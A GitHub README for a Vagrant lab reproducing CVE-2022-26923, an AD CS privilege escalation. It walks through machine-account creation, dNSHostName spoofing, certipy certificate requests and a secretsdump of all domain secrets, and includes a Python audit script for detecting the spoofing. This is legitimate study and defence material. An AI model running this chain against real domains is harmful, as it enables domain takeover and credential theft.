# CVE-2022-26923
## Description
This vulnerability allowed a low-privileged user to escalate privileges to domain administrator in a default Active Directory environment with the Active Directory Certificate Services (AD CS) server role installed.
It is mainly related to the Active Directory Certificate Services (AD CS) role. The AD CS role is a Windows Server role that allows you to build a public key infrastructure (PKI) and provide public key cryptography, digital certificates, and digital signature capabilities for your organization. The AD CS role is used to issue certificates for users, computers, and services.
## Table of Contents
- [CVE-2022-26923](#cve-2022-26923)
- [Description](#description)
- [Table of Contents](#table-of-contents)
- [Prerequisites](#prerequisites)
- [Environment](#environment)
- [Exploit](#exploit)
- [Proof of Concept](#proof-of-concept)
- [References](#references)
## Prerequisites
- [Vagrant](https://www.vagrantup.com/downloads)
- [VirtualBox](https://www.virtualbox.org/wiki/Downloads)
## Environment
The Windows Server version used is **Windows Server 2019** Standard Evaluation which is the vulnerable version.
The provided Vagrantfile (in the folder `Vulnerable Machine`) will create a Windows Server 2019 VM with the AD CS role installed and configured, along with a low-privileged user with the following credentials:
- Username: `user`
- Password: `V@grant1`
To create the environment, follow these steps:
- First clone the repository and go to the `CVE-2022-26923` directory:
```bash
git clone https://github.com/Gh-Badr/CVE-2022-26923
cd CVE-2022-26923
```
- If you need to change the default IP address, you can do it in the `Vagrantfile` by replacing the IP address in the following line:
```ruby
config.vm.network "private_network", type: "static", ip: "192.168.33.13"
```
- Then run the following command to create the VM:
```bash
cd 'Vulnerable Machine'
vagrant up
```
- If you don't have a Linux machine with `certipy` installed, you can use the provided Vagrant machine in the directory `Attacker Machine` by running the following command:
```bash
cd 'Attacker Machine'
vagrant up
```
The folder `Attacker Machine` contains a Vagrant machine along with a shell script that will install the latest version of `certipy`. You can also use the script to install `certipy` on your own Linux machine.
## Exploit
In order to connect to the attacker machine, run the following command from the `Attacker Machine` directory:
```bash
vagrant ssh
```
Now that you are in the attacking machine, you need to add the IP address of the Windows Server to the `hosts` file:
```bash
echo "192.168.33.13 VAGRANT-K51B6U3.vagrant.local VAGRANT-K51B6U3 vagrant-VAGRANT-K51B6U3-CA vagrant.local" | sudo tee -a /etc/hosts
```
**Note**: If you changed the IP address in the `Vagrantfile` of the vulnerable machine, you need to change it here too.
Then, let's create a new computer account in the domain:
```bash
addcomputer.py 'vagrant.local/user:V@grant1' -method LDAPS -computer-name 'CVEPC' -computer-pass 'P@ssw0rd'
```
To verify that the computer account has been created, connect to the vulnerable machine with the `user` and the password `V@grant1` by running the following command from the `Vulnerable Machine` directory:
```bash
vagrant ssh
```
Then, run the following command to verify that the computer account has been created:
```powershell
Get-ADComputer CVEPC -Properties dnsHostName,servicePrincipalName
```
This machine account has the dnsHostName `CVEPC.vagrant.local`. What we want is to change this dnsHostName to `VAGRANT-K51B6U3.vagrant.local`, which is the name of the domain controller.
To do so, we need to first delete the Service Principal Name (SPN) from the computer account `CVEPC` by running the following command:
```powershell
# Set-ADComputer has no -Properties parameter; passing $null to
# -ServicePrincipalNames clears every SPN on the account
Set-ADComputer CVEPC -ServicePrincipalNames $null
```
Then we can change the dnsHostName to `VAGRANT-K51B6U3.vagrant.local` by running the following command:
```powershell
# the dNSHostName attribute is set through the dedicated -DNSHostName parameter
Set-ADComputer CVEPC -DNSHostName VAGRANT-K51B6U3.vagrant.local
```
- Note: To understand why we had to delete the computer account SPN, you can refer to the project [Report](https://github.com/Gh-Badr/CVE-2022-26923/blob/main/Rapport%20CVE_2022_26923.pdf) (**in French**), or check the first article in the references section, which contains a detailed explanation by the author of the CVE.
Now that we have a computer account with the dnsHostName `VAGRANT-K51B6U3.vagrant.local`, we can request a malicious certificate from the vulnerable machine by running the following command on the attacking machine:
```bash
# the password is the one chosen for the computer account in the addcomputer.py step
certipy req -username 'CVEPC$@vagrant.local' -password 'P@ssw0rd' -ca vagrant-VAGRANT-K51B6U3-CA -template Machine -target VAGRANT-K51B6U3.vagrant.local
```
You should get a certificate called `vagrant-k51b6u3.pfx` in the current directory.
To check that the certificate is valid, use the `auth` tool of `certipy` by running the following command:
```bash
certipy auth -pfx vagrant-k51b6u3.pfx
```
If the certificate is valid, you should get the NTLM hash of the domain controller's machine account, which can be used in many malicious ways.
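As an added defender-side example that is not part of this PoC: the step above leaves a computer object whose dNSHostName no longer matches its own sAMAccountName, duplicates the DC's name, and has no SPNs left. The audit below flags exactly that state. The records are constructed inline in the shape `Get-ADComputer` returns, and the domain name and DC account name are assumed from this lab.

```python
# Added example (not part of the original PoC): flag computer objects whose
# dNSHostName does not match their own sAMAccountName, which is the
# inconsistency CVE-2022-26923 relies on.

DOMAIN = "vagrant.local"  # assumed lab domain from this README

# Constructed sample of computer objects, modelled on the lab after the PoC steps.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "VAGRANT-K51B6U3$",            # the DC (assumed account name)
     "dNSHostName": "VAGRANT-K51B6U3.vagrant.local",
     "servicePrincipalName": ["HOST/VAGRANT-K51B6U3.vagrant.local", "HOST/VAGRANT-K51B6U3"]},
    {"sAMAccountName": "CVEPC$",                      # the attacker-created account
     "dNSHostName": "VAGRANT-K51B6U3.vagrant.local",  # spoofed to the DC's name
     "servicePrincipalName": []},                     # SPNs cleared, as in the PoC
    {"sAMAccountName": "WS01$",                       # a benign workstation
     "dNSHostName": "WS01.vagrant.local",
     "servicePrincipalName": ["HOST/WS01.vagrant.local", "HOST/WS01"]},
]


def expected_dns_host_name(sam_account_name, domain):
    """A computer's dNSHostName should be <name without trailing $>.<domain>."""
    return f"{sam_account_name.rstrip('$')}.{domain}".lower()


def find_spoofed_hostnames(computers, domain=DOMAIN):
    """Return (sAMAccountName, reason) for every computer whose dNSHostName is
    not its own, or that collides with another computer's name, or has no SPNs."""
    findings = []
    # Map every legitimate hostname back to the account that should own it.
    owners = {expected_dns_host_name(c["sAMAccountName"], domain): c["sAMAccountName"]
              for c in computers}
    for c in computers:
        name = c["sAMAccountName"]
        actual = (c.get("dNSHostName") or "").lower()
        expected = expected_dns_host_name(name, domain)
        if actual != expected:
            owner = owners.get(actual)
            if owner and owner != name:   # the dangerous case: impersonating another host
                findings.append((name, f"dNSHostName {actual} belongs to {owner}"))
            else:
                findings.append((name, f"dNSHostName {actual or '<empty>'} != expected {expected}"))
        if not c.get("servicePrincipalName"):
            findings.append((name, "servicePrincipalName is empty"))
    return findings


if __name__ == "__main__":
    for account, reason in find_spoofed_hostnames(SAMPLE_COMPUTERS):
        print(f"[!] {account}: {reason}")
```

In a real domain, feed it the objects returned by `Get-ADComputer -Filter * -Properties dNSHostName,servicePrincipalName` instead of the constructed sample.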
## Proof of Concept
As a proof of concept, we can use the NTLM hash to retrieve all the secrets stored in the domain (as explained in the CVE author's article). To do so, we can use the tool `secretsdump.py` from the impacket suite (which is installed with the latest version of `certipy`).
To use the tool, run the following command:
```bash
secretsdump.py 'vagrant.local/vagrant-k51b6u3$@vagrant-k51b6u3.vagrant.local' -hashes :<NTLM hash>
```
Replace `<NTLM hash>` with the NTLM hash that you got from the previous step.
As a result, you should get all the secrets stored in the domain.
## References
- [Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4)
- [GitHub - LudovicPatho/CVE-2022-26923_AD-Certificate-Services](https://github.com/LudovicPatho/CVE-2022-26923_AD-Certificate-Services)
- [Try Hack Me - CVE-2022-26923](https://tryhackme.com/room/cve202226923)